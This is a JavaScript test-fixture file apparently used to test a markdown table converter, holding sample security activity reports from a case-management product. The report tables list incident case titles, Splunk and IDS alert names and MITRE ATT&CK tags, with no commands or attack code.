/* eslint-disable no-useless-escape */
export const mdReport = `![](cydarm.png) 

 

**Security Activity Summary Report:** 
 
**Cydarm Technologies** 
 
***2022-03-01 to 2022-03-25*** 
 
***Executive Summary for 2022-03-01 to 2022-03-25*** 
 
+---------------------------+----+
|                           |    |
+===========================+====+
| Number of Cases Opened:   | 0  |
|                           |    |
|                           |    |
+---------------------------+----+
| Number of Cases Closed:   | 0  |
|                           |    |
|                           |    |
+---------------------------+----+ 

 \ 

***Incident Response Metrics for 2022-03-01 to 2022-03-25*** 
 
+----------+------------------------+
| State    | Cumulative Median Time |
+==========+========================+
| Alert    | 127h 7m 34s            |
+----------+------------------------+
| Triage   | 127h 7m 36s            |
+----------+------------------------+
| Analysis | 127h 7m 38s            |
+----------+------------------------+ 

 \ 

***Incident Summary for 2022-03-01 to 2022-03-25*** 
 
+---------+-------------+----------+--------+----------------------+---------------------------------------+---------------------------------------+
| Locator | Description | Severity | Status | Tags                 | Opened                                | Closed                                |
+=========+=============+==========+========+======================+=======================================+=======================================+
| 532GM8  | dwed        |          | Closed | prevention, reviewed | 2022-03-07 23:34:52.558957 +1100 AEDT | 2022-03-18 13:49:56.931956 +1100 AEDT |
+---------+-------------+----------+--------+----------------------+---------------------------------------+---------------------------------------+
| 28GK03  | efffc       |          | Alert  |                      | 2022-03-07 23:35:25.205354 +1100 AEDT |                                       |
+---------+-------------+----------+--------+----------------------+---------------------------------------+---------------------------------------+
| N28VEX  | wed         |          | Alert  | reviewed             | 2022-03-07 23:33:27.330763 +1100 AEDT |                                       |
+---------+-------------+----------+--------+----------------------+---------------------------------------+---------------------------------------+
| W67PQ8  | wed         |          | Closed | prevention           | 2022-03-07 23:34:35.648242 +1100 AEDT | 2022-03-07 23:34:47.977591 +1100 AEDT |
+---------+-------------+----------+--------+----------------------+---------------------------------------+---------------------------------------+
| A0ZF5M  | 1           |          | Alert  | reviewed             | 2022-03-07 23:33:42.491617 +1100 AEDT |                                       |
+---------+-------------+----------+--------+----------------------+---------------------------------------+---------------------------------------+ 

 \ 

***Incidents Ongoing from 2022-03-01 to 2022-03-25*** 
 
+---------+---------------------+-------------+----------+--------+----------+---------------------------------------+
| Locator | Organisation        | Description | Severity | Status | Tags     | Opened                                |
+=========+=====================+=============+==========+========+==========+=======================================+
| 28GK03  | Cydarm Technologies | efffc       |          | Alert  |          | 2022-03-07 23:35:25.205354 +1100 AEDT |
+---------+---------------------+-------------+----------+--------+----------+---------------------------------------+
| N28VEX  | Cydarm Technologies | wed         |          | Alert  | reviewed | 2022-03-07 23:33:27.330763 +1100 AEDT |
+---------+---------------------+-------------+----------+--------+----------+---------------------------------------+
| A0ZF5M  | Cydarm Technologies | 1           |          | Alert  | reviewed | 2022-03-07 23:33:42.491617 +1100 AEDT |
+---------+---------------------+-------------+----------+--------+----------+---------------------------------------+ 

 \ 

***Most Used Case Type Tags from 2022-03-01 to 2022-03-25*** 
 
+---------+---------+
| Tag     | Count   |
+=========+=========+
| No data | No data |
+---------+---------+ 

 \ 

***Most Used MITRE Tags from 2022-03-01 to 2022-03-25*** 
 
+---------+---------+
| Tag     | Count   |
+=========+=========+
| No data | No data |
+---------+---------+ 

 \ 

***Most Used Playbooks from 2022-03-01 to 2022-03-25*** 
 
+----------+---------+
| Playbook | Count   |
+==========+=========+
| No data  | No data |
+----------+---------+
`;

export const gfmTable1 = `

## one 

| foo | bar |
| --- | --- |
| baz | bim |

## one-b

|foo|bar|
|---|---|
|baz|bim|


# two


|||
|---|---|
| foo | bar |
| baz | bim |



`;

export const gridTable1 = `
+----------+------------------------+
| State    | Cumulative Median Time |
+==========+========================+
| Alert    | 127h 7m 34s            |
+----------+------------------------+
| Triage   | 127h 7m 36s            |
+----------+------------------------+
| Analysis | 127h 7m 38s            |
+----------+------------------------+

`;

export const sampleTransformed = `
| State    | Cumulative Median Time |
|---|---|
| Alert | 127h 7m 34s |
| Triage | 127h 7m 36s |
| Analysis | 127h 7m 38s |
`;

export const sampleTransformed2 = `

| State    | Cumulative Median Time |
|---|---|
| Alert    | 127h 7m 34s            |

| Triage   | 127h 7m 36s            |

| Analysis | 127h 7m 38s            |
`;

// Format of the markdown as per this PR:
//https://github.com/cydarm/case-management/pull/2401
export const sampleReport2 = `
**Summary Activity Report:** 
 
 



***Executive Summary*** 
 
 

***Reporting period*** 
 
 

Start time 2021-01-03 00:00:00 

End time 2022-03-08 23:59:00 

Timezone of this report: +1100 AEDT 



***Organisation(s) included in this report*** 
 
Cydarm 



***Case Count and Activity Summary*** 
 
Table:Table 1: Overview of total cases opened and closed during the reporting period. 

+------------------------------------------------+-----------+
| **Description**                                | **Count** |
+================================================+===========+
| A: Active cases at start of period:            | 148       |
+------------------------------------------------+-----------+
| B: Total cases opened during reporting period: | 291       |
+------------------------------------------------+-----------+
| C: Total cases closed during reporting period: | 37        |
+------------------------------------------------+-----------+
| D: Active cases at end of reporting period:    | 402       |
+------------------------------------------------+-----------+ 

(Validation check: A + B - C = D) 

Table:Table 2: Activity Summary from the reporting period. 

+---------------------------------------------------+-----------------+
| **Metric**                                        | **Value**       |
+===================================================+=================+
| Total unique cases included in this report (A+B): | 439             |
+---------------------------------------------------+-----------------+
| Backlog improvement (A-D):                        | -254            |
+---------------------------------------------------+-----------------+
| Average age of cases closed (C):                  | 20d 18h 42m 29s |
+---------------------------------------------------+-----------------+ 



***Workflow State Response Times*** 
 
 

This table reports the median and mean duration in each state for all cases that were active at the start of this reporting period (A), or were opened during the reporting period (B). Also included is the count of cases that pass through each state, since some states may be skipped or may be visited multiple times. 

Table:Table 3: Summary of time spent in each workflow state. 

+-----------------+--------------------------------+--------------------------------+----------------+
| **State**       | **Median Time In State         | **Mean Time In State           | **Case Count** |
|                 | (hh:mm:ss)**                   | (hh:mm:ss)**                   |                |
+-----------------+--------------------------------+--------------------------------+----------------+
| Triage          | 185:55:21                      | 1011:55:38                     | 83             |
+-----------------+--------------------------------+--------------------------------+----------------+
| Analysis        | 00:00:18                       | 249:24:06                      | 56             |
+-----------------+--------------------------------+--------------------------------+----------------+
| Containment     | 00:00:10                       | 650:23:40                      | 7              |
+-----------------+--------------------------------+--------------------------------+----------------+
| Eradication     | 00:00:21                       | 00:00:21                       | 2              |
+-----------------+--------------------------------+--------------------------------+----------------+
| Recovery        | 00:00:12                       | 00:00:12                       | 1              |
+-----------------+--------------------------------+--------------------------------+----------------+
| Pending Closure | 00:00:07                       | 00:00:10                       | 3              |
+-----------------+--------------------------------+--------------------------------+----------------+
| Review          | 00:00:00                       | 00:00:00                       | 0              |
+-----------------+--------------------------------+--------------------------------+----------------+ 

(Explanatory note: The median and mean are calculated from the duration of each visit of each case to that state. So, if the state is visited twice by a single case, then the case count is incremented by 2, and the duration of each visit is added separately. The entire duration of the state visit must be counted, even if the transition time is outside of the reporting period.) 



***Case Lists for the Reporting Period*** 
 
 

This section contains summaries of the cases that were active during this reporting period. 

Table:Table 4: Cases opened opened prior to the reporting period and in a closed state at the end of this reporting period. 

+-------------+------------------+-------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------------------------------------------------+---------------------+
| **Locator** | **Organisation** | **Description**                                                                                                         | **Severity** | **Status** | **Tag**                                             | **Opened**          |
+=============+==================+=========================================================================================================================+==============+============+=====================================================+=====================+
| 651QLM      | Cydarm           | test case                                                                                                               |              | Closed     | mitre-attack:t1161-lc_load_dylib_addition           | 2020-10-06 22:57:00 |
|             |                  |                                                                                                                         |              |            | mitre-attack:t1100-web_shell                        |                     |
+-------------+------------------+-------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------------------------------------------------+---------------------+
| 74FCAM      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(copy.exe\). A Deny Policy Action was applied |              | Closed     | mitre-attack:t1119-automated_collection             | 2020-12-13 14:04:00 |
|             |                  |                                                                                                                         |              |            | mitre-attack:t1115-clipboard_data                   |                     |
|             |                  |                                                                                                                         |              |            | mitre-attack:t1148-histcontrol                      |                     |
|             |                  |                                                                                                                         |              |            | mitre-attack:t1211-exploitation_for_defense_evasion |                     |
+-------------+------------------+-------------------------------------------------------------------------------------------------------------------------+--------------+------------+-----------------------------------------------------+---------------------+ 

Table:Table 5: Cases opened prior to the reporting period and remaining in an open state at the end of this reporting period. 

+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| **Locator** | **Organisation** | **Description**                                                                                                                    | **Severity** | **Status** | **Tag**                                                                       | **Opened**          | **Closed**          | **Total Age of Case** |
+=============+==================+====================================================================================================================================+==============+============+===============================================================================+=====================+=====================+=======================+
| A94HKK      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:10:00 | 2020-04-29 00:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 2BLDZV      | Cydarm           | test case                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-09-21 15:11:00 | 2020-09-21 15:14:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1192-spearphishing_link                                         |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1193-spearphishing_attachment                                   |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| YMT6UM      | Cydarm           | ET SCAN Suspicious inbound to PostgreSQL port 5432  - \(0_TI62kB4npTB-ZoXeIp\) - 10.20.0.235                                       |              | Closed     |                                                                               | 2019-12-09 23:29:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| U6VULL      | Cydarm           | ET SCAN Suspicious inbound to mySQL port 3306  - \(D_TF62kB4npTB-Zo99zA\) - 10.20.0.235                                            |              | Closed     |                                                                               | 2019-12-09 23:29:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 5WWYRP      | Cydarm           | fortigate event 2                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:30:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| RNNKMC      | Cydarm           | New case for Cydarm organisation                                                                                                   |              | Closed     | reviewed                                                                      | 2020-06-28 11:40:00 | 2020-06-28 11:40:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| AC2XBD      | Cydarm           | hello there                                                                                                                        |              | Closed     |                                                                               | 2020-04-12 19:28:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZG49RD      | Cydarm           | You’ve renewed your Microsoft 365 Apps for business subscription                                                                   |              | Closed     |                                                                               | 2020-06-04 13:55:00 | 2021-07-01 01:54:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| B76D46      | Cydarm           | Possible credential stuffing attack                                                                                                |              | Closed     |                                                                               | 2020-06-11 03:59:00 | 2020-06-11 04:04:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZAM5SB      | Cydarm           | Message Center Major Change Update Notification                                                                                    |              | Closed     |                                                                               | 2020-10-06 07:10:00 | 2020-10-06 07:10:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| TS9R6X      | Cydarm           | Weekly digest: Office 365 changes                                                                                                  |              | Closed     |                                                                               | 2020-06-15 02:33:00 | 2020-06-15 02:33:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| K5XU3L      | Cydarm           | hello there                                                                                                                        |              | Closed     |                                                                               | 2020-04-12 19:28:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| X0KLD9      | Cydarm           | Weekly digest: Office 365 changes                                                                                                  |              | Closed     |                                                                               | 2020-06-09 23:45:00 | 2020-06-09 23:45:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| W8NP3V      | Cydarm           | Here's another one for staging                                                                                                     |              | Closed     | reviewed                                                                      | 2020-06-28 11:05:00 | 2020-06-28 11:05:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| LUPPHJ      | Cydarm           | new case from Vaughan                                                                                                              |              | Closed     |                                                                               | 2020-10-12 00:33:00 | 2020-10-12 00:33:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| FAN7U0      | Cydarm           | Weekly digest: Office 365 changes                                                                                                  |              | Closed     | reviewed                                                                      | 2020-06-22 02:24:00 | 2020-06-22 02:24:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| DSHTDR      | Cydarm           | Message Center Major Change Update Notification                                                                                    |              | Closed     |                                                                               | 2020-06-10 20:21:00 | 2020-06-10 20:21:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| NGE98B      | Cydarm           | curl case                                                                                                                          |              | Closed     |                                                                               | 2020-10-14 14:03:00 | 2020-10-14 14:03:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 3L0XMJ      | Cydarm           | Message Center Major Change Update Notification                                                                                    |              | Closed     |                                                                               | 2020-06-10 11:58:00 | 2020-06-10 11:58:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 5S0GB8      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     | mitre-attack:t1211-exploitation_for_defense_evasion                           | 2020-10-14 14:07:00 | 2020-10-14 14:07:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1161-lc_load_dylib_addition                                     |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1013-port_monitors                                              |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | data-breach                                                                   |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 5C3W3F      | Cydarm           | Possible credential stuffing attack                                                                                                |              | Closed     |                                                                               | 2020-06-11 02:58:00 | 2020-06-11 02:58:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| FEZQV1      | Cydarm           | Suspicious inbound                                                                                                                 |              | Closed     |                                                                               | 2020-10-17 02:35:00 | 2020-10-17 02:38:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| HYKPU2      | Cydarm           | Action required: Update your OS to support SHA-2 by August 17, 2020                                                                |              | Closed     | reviewed                                                                      | 2020-06-28 10:37:00 | 2020-06-28 10:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4VUDDB      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-07-22 18:33:00 | 2020-07-22 18:33:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| VK6X15      | Cydarm           | This is a  casae                                                                                                                   |              | Closed     | mitre-attack:t1211-exploitation_for_defense_evasion                           | 2020-11-13 03:53:00 | 2020-11-13 03:53:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 9CS88X      | Cydarm           | tesing 9/12                                                                                                                        |              | Closed     |                                                                               | 2020-12-08 22:52:00 | 2020-12-08 22:52:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 6JMV2B      | Cydarm           | check SLAs                                                                                                                         |              | Closed     |                                                                               | 2020-05-08 02:43:00 | 2020-05-08 02:49:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| P6M0XU      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-12-13 11:52:00 | 2020-12-13 11:52:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| TPY0EH      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-12-13 12:13:00 | 2020-12-13 12:13:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 42QU0R      | Cydarm           | IDS network traffic: PROTOCOL-SNMP request tcp                                                                                     |              | Closed     |                                                                               | 2020-11-25 13:06:00 | 2020-11-25 13:06:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| VKL6N1      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(ping.exe\). A Deny Policy Action was applied            |              | Closed     |                                                                               | 2020-12-13 13:27:00 | 2020-12-13 13:27:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| D2423X      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     | reviewed                                                                      | 2020-12-13 11:16:00 | 2020-12-13 11:16:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| QW74LP      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     | reviewed                                                                      | 2020-12-13 11:30:00 | 2020-12-13 11:30:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| QHGD5E      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-05-03 17:01:00 | 2020-05-05 04:34:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 93KJX3      | Cydarm           | test 1                                                                                                                             |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-07-23 05:23:00 | 2020-08-13 13:53:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1161-lc_load_dylib_addition                                     |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1193-spearphishing_attachment                                   |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 5JHJ6N      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(nslookup.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 13:26:00 | 2020-12-13 13:26:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| E8Z7KE      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(nslookup.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 13:29:00 | 2020-12-13 13:29:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| K8C18S      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(quser.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 13:09:00 | 2020-12-13 13:09:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| PF32QK      | Cydarm           | Lazarus group STIX                                                                                                                 |              | Closed     |                                                                               | 2020-12-02 11:24:00 | 2020-12-11 00:48:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| UCLPU8      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(cscript.exe\). A Deny Policy Action was applied         |              | Closed     | mitre-attack:t1086-powershell                                                 | 2020-11-25 13:16:00 | 2020-11-26 23:49:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 74CJ3B      | Cydarm           | Message Center Major Change Update Notification                                                                                    |              | Closed     | mitre-attack:t1013-port_monitors                                              | 2020-06-10 02:43:00 | 2020-06-10 02:43:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZJ8PZ3      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(netsh.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 13:55:00 | 2020-12-13 13:55:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| EY95PB      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(netsh.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 13:52:00 | 2020-12-13 13:52:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| X6XG84      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(netsh.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 13:50:00 | 2020-12-13 13:50:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 8H6ZPL      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(runas.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 14:25:00 | 2020-12-13 14:25:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| J49KEE      | Cydarm           | urgent message                                                                                                                     |              | Closed     | mitre-attack:t1072-third-party_software                                       | 2020-05-31 05:33:00 | 2021-07-01 01:54:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 6QNBAJ      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(xcopy.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 15:14:00 | 2020-12-13 15:14:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ACBVVH      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(runas.exe\). A Deny Policy Action was applied           |              | Closed     |                                                                               | 2020-12-13 14:39:00 | 2020-12-13 14:39:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| HFXGKY      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(systeminfo.exe\). A Deny Policy Action was applied      |              | Closed     |                                                                               | 2020-12-13 14:44:00 | 2020-12-13 14:44:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 8T5ACN      | Cydarm           | SolarWinds                                                                                                                         |              | Closed     |                                                                               | 2020-12-21 12:48:00 | 2020-12-21 12:48:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4FD3SJ      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(arp.exe\). A Deny Policy Action was applied             |              | Closed     |                                                                               | 2020-12-13 15:25:00 | 2020-12-13 15:25:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 718W6P      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(nslookup.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 15:21:00 | 2020-12-13 15:21:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| PN0GTA      | Cydarm           | Breach Case                                                                                                                        |              | Closed     |                                                                               | 2020-05-13 00:20:00 | 2020-05-13 00:20:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| BA8QQ0      | Cydarm           | Fraud Case                                                                                                                         |              | Closed     | mitre-attack:t1119-automated_collection                                       | 2020-05-13 03:55:00 | 2020-05-13 03:55:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1211-exploitation_for_defense_evasion                           |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4SNETP      | Cydarm           | Message Center Major Change Update Notification                                                                                    |              | Closed     |                                                                               | 2020-06-05 21:48:00 | 2020-06-05 21:48:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 0311YR      | Cydarm           | Phishing incident                                                                                                                  |              | Closed     | mitre-attack:t1192-spearphishing_link                                         | 2020-07-30 16:59:00 | 2020-07-30 17:17:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| A33ZZ9      | Cydarm           | IDS network traffic: email initiated recon                                                                                         |              | Closed     | mitre-mobile-attack:t1423-network_service_scanning                            | 2020-05-04 05:58:00 | 2020-06-11 00:05:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| JGDV1B      | Cydarm           | skyshing attempt                                                                                                                   |              | Closed     | mitre-attack:t1072-third-party_software                                       | 2020-05-19 11:35:00 | 2021-07-01 01:54:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| KR9FH8      | Cydarm           | This is a new case about a new thing                                                                                               |              | Closed     |                                                                               | 2020-05-05 05:09:00 | 2020-05-05 05:10:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 9DEMDC      | Cydarm           | View your Microsoft 365 Apps for business invoice                                                                                  |              | Closed     | mitre-mobile-attack:t1462-malicious_software_development_tools                | 2020-06-07 01:14:00 | 2020-06-07 01:14:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 98VBGE      | Cydarm           | SANS blocklist - Threat - Source And Destination Matches - Threat Gen \(threatlist\) - 196.52.43.103                               |              | Closed     |                                                                               | 2020-05-04 05:52:00 | 2020-05-05 04:34:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 6VC6ZD      | Cydarm           | Renew your Microsoft subscriptions                                                                                                 |              | Closed     | reviewed                                                                      | 2020-06-23 09:01:00 | 2020-06-23 09:01:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| U1WLVE      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:13:00 | 2020-04-29 00:37:00 |                       |
